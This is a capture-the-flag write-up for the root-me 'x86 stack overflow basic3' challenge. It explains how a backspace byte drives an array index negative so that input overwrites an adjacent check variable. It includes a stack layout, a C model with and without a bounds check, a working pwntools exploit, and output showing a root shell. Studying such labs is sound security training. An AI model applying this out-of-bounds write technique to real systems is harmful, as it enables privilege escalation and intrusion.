root-me: x86 stack overflow basic3

2017-11-29

x86 stack overflow basic3

general

From the source code we found:
* We can drive the index into the array buffer to a negative value. An important property of an array is that we can read or write the content near its base address.
* Send 0x08 to move the index count so that it points at the right area (check), then send 0xbffffabc.

step

Locate the position of check from the declarations:

char buffer[64];
int check;
int i = 0;
int count = 0;

so its stack layout is:

buffer array           //buffer[8]
buffer array           //buffer[4]
buffer base address   //buffer[0]
check                 //buffer[-4]
i
count                 //low address

Send four \x08 bytes to make count be -4.
Then send 0xbffffabc in little-endian byte order.
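
To see why the four 0x08 bytes matter, here is an added C model of the index handling (not the challenge's source and not code from the original post). It assumes, as the steps above describe, that 0x08 decrements count; the frame is modelled as one byte array so the write below buffer[0] stays defined, and the initial check value 0x04030201 is constructed. The checked mode adds the lower-bound test whose absence makes the overwrite possible.

```c
#include <stdint.h>
#include <stdio.h>

#define BUF_LEN 64
#define BUF_OFF 4   /* modelled frame: mem[0..3] = check, mem[4..67] = buffer */

/* Read check the way a little-endian x86 load would. */
static uint32_t read_check(const unsigned char *m) {
    return (uint32_t)m[0] | (uint32_t)m[1] << 8 | (uint32_t)m[2] << 16 | (uint32_t)m[3] << 24;
}

/* Assumed input loop: 0x08 steps the index back, any other byte is stored.
   checked=0 reproduces the flaw; checked=1 enforces 0 <= count < BUF_LEN.
   Returns how many input bytes the bounds check refused. */
static int feed(unsigned char *mem, const unsigned char *in, size_t n, int checked) {
    int count = 0, refused = 0;
    for (size_t i = 0; i < n; i++) {
        if (in[i] == 0x08) {
            if (checked && count == 0) { refused++; continue; }
            count--;
        } else {
            if (checked && count >= BUF_LEN) { refused++; continue; }
            if (count < -BUF_OFF || count >= BUF_LEN) continue; /* outside the model */
            mem[BUF_OFF + count] = in[i];
            count++;
        }
    }
    return refused;
}

/* Run the page's 8-byte input against a fresh frame; returns the final check. */
static uint32_t run(int checked, int *refused) {
    static const unsigned char input[] = { 8, 8, 8, 8, 0xbc, 0xfa, 0xff, 0xbf };
    unsigned char mem[BUF_OFF + BUF_LEN] = { 0x01, 0x02, 0x03, 0x04 }; /* constructed check */
    *refused = feed(mem, input, sizeof input, checked);
    return read_check(mem);
}

int main(void) {
    int r0, r1;
    uint32_t c0 = run(0, &r0), c1 = run(1, &r1);
    printf("unchecked: check=0x%08x  checked: check=0x%08x (refused %d)\n", (unsigned)c0, (unsigned)c1, r1);
    return 0;
}
```

With the check enabled the four backspaces are refused at count == 0, so the following four bytes land in buffer[0..3] and check is untouched.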

exploit

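from pwn import *

# Local challenge binary
p = process('./ch16')
p.recvuntil(b':')
# Four 0x08 bytes move count to -4, then the four bytes written over check (little endian)
p.sendline(b'\x08' * 4 + b'\xbc\xfa\xff\xbf')
p.interactive()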

run it:

 ⚡ root@pwn  /mnt/hgfs/pwnexc/root-me/x86 bof b3  python exp_ch16.py
[+] Starting local process './ch16': pid 3873
[*] Switching to interactive mode
 $ id
uid=0(root) gid=0(root) 组=0(root)
 $